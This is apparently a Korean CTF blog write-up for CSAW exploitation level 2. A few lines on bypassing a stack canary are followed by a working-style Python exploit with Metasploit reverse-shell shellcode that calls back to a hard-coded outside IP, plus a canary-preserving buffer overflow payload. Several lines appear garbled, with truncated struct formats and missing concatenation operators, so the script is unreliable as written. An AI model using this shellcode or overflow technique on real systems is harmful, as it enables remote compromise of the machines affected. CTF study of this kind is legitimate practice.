sweetchip's blog


버퍼 주소까지 그냥 줘서 까나리만 맞춰주고 금방 잘 풀수 있엇다.


처음에는 canary가 잇는줄 모르고 분명히 exploit 코드가 맞는데 라고 생각하면서 고집부리다가 피본 문제다;;


canary를 맞춰주지 않으면 return 이 아닌 exit 을 하기때문에 eip가 변조되지 않는다.



exploit2



Aslr : Off (fork())

NX : Off (execstack : X)


from socket import *

from struct import pack, unpack

import time


#csaw exploitation level2

p = lambda x : pack("

up = lambda x : unpack("


buffer = 0x00000000


# linux/x86/shell_reverse_tcp - 95 bytes

# http://www.metasploit.com

# Encoder: x86/shikata_ga_nai

# VERBOSE=false, LHOST=220.117.247.200, LPORT=12071,

# ReverseConnectRetries=5, ReverseAllowProxy=false,

# PrependSetresuid=false, PrependSetreuid=false,

# PrependSetuid=false, PrependSetresgid=false,

# PrependSetregid=false, PrependSetgid=false,

# PrependChrootBreak=false, AppendExit=false,

# InitialAutoRunScript=, AutoRunScript=

shellcode = ("\xd9\xcf\xd9\x74\x24\xf4\x5d\x33\xc9\xb1\x12\xba\x5c\xa8"

"\x72\xf6\x83\xed\xfc\x31\x55\x13\x03\x09\xbb\x90\x03\x80"

"\x60\xa3\x0f\xb1\xd5\x1f\xba\x37\x53\x7e\x8a\x51\xae\x01"

"\x78\xc4\x80\x3d\xb2\x76\xa9\x38\xb5\x1e\xf6\xce\xb2\x16"

"\x6e\x33\x3d\x89\x48\xba\xdc\x65\xf0\xec\x4f\xd6\x4e\x0f"

"\xf9\x39\x7d\x90\xab\xd1\x51\xbe\x38\x49\xc6\xef\xdc\xe0"

"\x78\x79\xc3\xa0\xd7\xf0\xe5\xf4\xd3\xcf\x66")


HOST = "128.238.66.212"

#HOST = "192.168.242.128"

PORT = 31338


s = socket(AF_INET,SOCK_STREAM)

s.connect((HOST,PORT))


print "[*] CSAW Exploitation Level2 Exploit" # by sweetchip


buffer = s.recv(4)

print "[*] Buffer : " hex(up(buffer))

canary = s.recv(4)

print "[*] Canary : " hex(up(canary))

s.recv(12070)


exploit = ""

exploit = "\x90"*60

exploit = shellcode

exploit = "\x90" * (0x800-len(exploit))

exploit = canary

exploit = "\x90" * (0x80c-len(exploit))

exploit = "SWCP"

exploit = buffer


print "[*] Sending Exploit Codes.."

s.send(exploit)


raw_input("\ngive me shell! > ")



신고

댓글 0